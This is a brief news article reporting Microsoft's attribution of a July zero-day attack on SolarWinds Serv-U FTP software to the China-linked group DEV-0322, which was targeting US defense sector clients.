According to Microsoft’s Threat Intelligence Center (MSTIC), the group “DEV-0322” attacked SolarWinds’ Serv-U FTP software on Tuesday. The hackers were attempting to access the company’s US defense sector clients.
An automated Microsoft 365 Defender scan first spotted the zero-day attack. Microsoft explains in more detail in its blog about the “anomalous malicious process” that the software noticed, but it appears the hackers were trying to become Serv-U administrators, among other suspicious actions.
A Microsoft report claims Chinese hackers were behind the SolarWinds attack
SolarWinds explained in a report published on July 9th that all versions of Serv-U since May 5th had the zero-day vulnerability. According to Microsoft, the Secure Shell protocol (SSH) used by Serv-U is only vulnerable when connected to the internet following the release of a hotfix to address the issue.
We strongly recommend that all users of the older Serv-U software upgrade immediately to prevent malicious code from being installed and executed or to prevent the alteration of data.
SolarWinds made headlines in December 2020 for the first time after a security breach exposed hundreds of businesses and government agencies. Microsoft says this zero-day attack originates from China, unlike the previous hack, which was associated with the Russian state-affiliated group Cozy Bear.
Microsoft writes that DEV-0322 specializes in attacking “US Defense Industrial Base Sector entities,” and that it uses compromised consumer routers in its attacker infrastructure as well as commercial VPN solutions.